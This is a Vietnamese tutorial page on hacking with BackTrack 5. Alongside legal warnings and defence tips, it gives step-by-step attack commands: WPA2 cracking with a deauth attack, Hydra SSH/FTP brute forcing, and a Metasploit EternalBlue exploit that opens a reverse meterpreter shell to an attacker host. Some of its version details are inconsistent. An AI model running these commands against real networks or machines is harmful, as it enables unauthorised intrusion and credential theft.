Công Cụ Tính Toán Hack Máy Tính Với BackTrack 5
Nhập thông tin để ước tính thời gian và tài nguyên cần thiết cho quá trình hack máy tính sử dụng BackTrack 5
Kết Quả Phân Tích
Hướng Dẫn Hack Máy Tính Bằng Phần Mềm BackTrack 5 (Cập Nhật 2024)
Việc hack máy tính mà không được phép là bất hợp pháp theo luật pháp Việt Nam (Bộ luật Hình sự 2015) và quốc tế. Bài viết này chỉ phục vụ mục đích nghiên cứu bảo mật và phòng thủ. Tác giả không chịu trách nhiệm về bất kỳ hành vi vi phạm pháp luật nào.
BackTrack 5 Là Gì?
BackTrack 5 (nay là Kali Linux) là hệ điều hành chuyên dụng cho kiểm thử xâm nhập (penetration testing) và đánh giá bảo mật. Phiên bản BackTrack 5 (ra mắt 2011) tích hợp hơn 300 công cụ hack mũ trắng, bao gồm:
- Metasploit Framework: Khung tấn công tự động hóa
- Aircrack-ng: Bẻ khóa mạng WiFi
- John the Ripper: Bẻ khóa mật khẩu
- Nmap: Quét lỗ hổng mạng
- Social Engineering Toolkit (SET): Tấn công kỹ thuật xã hội
Hướng Dẫn Chi Tiết Sử Dụng BackTrack 5
1. Cài Đặt BackTrack 5
BackTrack 5 có thể chạy trực tiếp từ USB (Live CD) hoặc cài đặt đầy đủ trên máy ảo/physic:
- Tải ISO: Tải từ trang chủ Kali (BackTrack 5 đã ngừng hỗ trợ, nhưng có thể tìm bản lưu trữ)
- Tạo USB boot: Sử dụng
dd if=backtrack5.iso of=/dev/sdX(Linux) hoặc Rufus (Windows) - Khởi động: Chọn “BackTrack Text – Foreground” (chế độ CLI) hoặc “BackTrack Graphical” (GUI)
- Đăng nhập mặc định:
- Username:
root - Password:
toor
- Username:
2. Cập Nhật Hệ Thống
Trước khi sử dụng, cập nhật các gói phần mềm:
apt-get update && apt-get upgrade -y
Lưu ý: BackTrack 5 dựa trên Ubuntu 10.04 (cũ), nên một số gói có thể không còn hỗ trợ.
3. Các Lệnh BackTrack 5 Cơ Bản
| Lệnh | Mô Tả | Ví Dụ |
|---|---|---|
startx |
Khởi động giao diện đồ họa | startx |
ifconfig |
Kiểm tra card mạng | ifconfig eth0 up |
airmon-ng |
Quản lý card mạng không dây | airmon-ng start wlan0 |
msfconsole |
Khởi động Metasploit | msfconsole |
Các Kỹ Thuật Hack Phổ Biến Với BackTrack 5
1. Hack Mật Khẩu WiFi (WPA2)
Sử dụng Aircrack-ng để bắt gói tin và bẻ khóa:
- Bật chế độ monitor:
airmon-ng start wlan0
- Quét mạng:
airodump-ng wlan0mon
- Chọn mục tiêu (Ctrl+C, ghi lại BSSID và kênh):
airodump-ng -c [kênh] --bssid [BSSID] -w capture wlan0mon
- Deauth attack (buộc thiết bị reconnect):
aireplay-ng -0 5 -a [BSSID] -c [Client-MAC] wlan0mon
- Bẻ khóa với wordlist:
aircrack-ng -w /pentest/passwords/wordlists/darkc0de.txt capture-01.cap
Hack WiFi lạ là vi phạm pháp luật tại Việt Nam (Điều 288 Bộ luật Hình sự). Chỉ sử dụng trên mạng của bạn với sự cho phép.
2. Tấn Công Brute Force SSH/FTP
Sử dụng Hydra để tấn công brute force:
hydra -l [username] -P /pentest/passwords/wordlists/rockyou.txt [IP] ssh
| Tham Số | Ý Nghĩa |
|---|---|
-l |
Username đơn |
-L |
File chứa danh sách username |
-P |
File wordlist mật khẩu |
ssh |
Giao thức (có thể thay bằng ftp, http-post-form,… |
Thời gian ước tính phụ thuộc vào:
- Độ phức tạp mật khẩu (xem công cụ tính toán phía trên)
- Tốc độ mạng (VPN/Proxy làm chậm 30-50%)
- Cấu hình phần cứng (CPU nhiều lõi tăng tốc độ brute force)
3. Khai Thác Lỗ Hổng Với Metasploit
Metasploit trong BackTrack 5 hỗ trợ hơn 1,500 exploit. Ví dụ với lỗ hổng EternalBlue (MS17-010):
- Khởi động Metasploit:
msfconsole
- Chọn exploit:
use exploit/windows/smb/ms17_010_eternalblue
- Cấu hình RHOSTS (IP mục tiêu):
set RHOSTS 192.168.1.100
- Chọn payload (mã độc tải về):
set payload windows/meterpreter/reverse_tcp
- Cấu hình LHOST (IP máy tấn công):
set LHOST 192.168.1.50
- Thực thi:
exploit
Lưu ý: EternalBlue đã được vá từ 2017. BackTrack 5 cũ có thể không hỗ trợ exploit mới.
Phòng Thủ Chống Hack BackTrack 5
Để bảo vệ hệ thống khỏi các cuộc tấn công từ BackTrack 5:
- Cập nhật hệ thống:
- Windows:
Windows Update - Linux:
sudo apt update && sudo apt upgrade -y
- Windows:
- Sử dụng mật khẩu mạnh:
- Ít nhất 12 ký tự, bao gồm chữ hoa, chữ thường, số và ký tự đặc biệt
- Tránh sử dụng từ điển (ví dụ:
password123)
- Tắt các dịch vụ không cần thiết:
- SSH (port 22)
- FTP (port 21)
- RDP (port 3389)
- Cài đặt tường lửa:
- Windows: Windows Defender Firewall
- Linux:
ufwhoặciptables
- Sử dụng phần mềm diệt virus:
- Kaspersky, Bitdefender, ESET NOD32
- Cập nhật định nghĩa virus hàng ngày
So Sánh BackTrack 5 vs Kali Linux (2024)
| Tiêu Chí | BackTrack 5 (2011) | Kali Linux (2024) |
|---|---|---|
| Nền tảng | Ubuntu 10.04 (cũ) | Debian Testing (mới) |
| Số lượng công cụ | ~300 | ~600+ |
| Hỗ trợ phần cứng | Hạn chế (driver cũ) | Tốt (hỗ trợ GPU, WiFi 6) |
| Cập nhật bảo mật | Không còn | Hàng tuần |
| Giao diện | GNOME 2 | Xfce/KDE Plasma |
| Hỗ trợ ARM | Không | Có (Raspberry Pi,… |
Nên sử dụng Kali Linux cho các dự án mới vì BackTrack 5 đã lỗi thời và chứa nhiều lỗ hổng chưa vá.
Tài Nguyên Học Tập Chính Thức
Để học hack mũ trắng hợp pháp, tham khảo các nguồn sau:
- Offensive Security (OSCP) – Chứng chỉ hacker mũ trắng hàng đầu
- SANS Institute – Khóa học bảo mật mạng
- CISA (Cơ quan An ninh mạng Hoa Kỳ) – Hướng dẫn bảo mật quốc gia
- NIST (Viện Tiêu chuẩn và Công nghệ Quốc gia) – Khung bảo mật cybersecurity
Kết Luận
BackTrack 5 là công cụ mạnh mẽ nhưng đã lỗi thời. Việc sử dụng nó để hack máy tính mà không được phép là bất hợp pháp và có thể dẫn đến:
- Hình sự: Phạt tiền lên đến 1 tỷ đồng hoặc tù giam (Điều 288 BLHS)
- Dân sự: Bồi thường thiệt hại cho nạn nhân
- Hành chính: Phạt vi phạm quy định an ninh mạng
Thay vào đó, hãy:
- Học bảo mật mạng để phòng thủ
- Tham gia các cuộc thi CTF (Capture The Flag)
- Lấy chứng chỉ CEH, OSCP, CISSP
- Làm việc trong lĩnh vực an ninh mạng hợp pháp
Bảo mật mạng là trách nhiệm của tất cả chúng ta. Hãy sử dụng kiến thức một cách có đạo đức!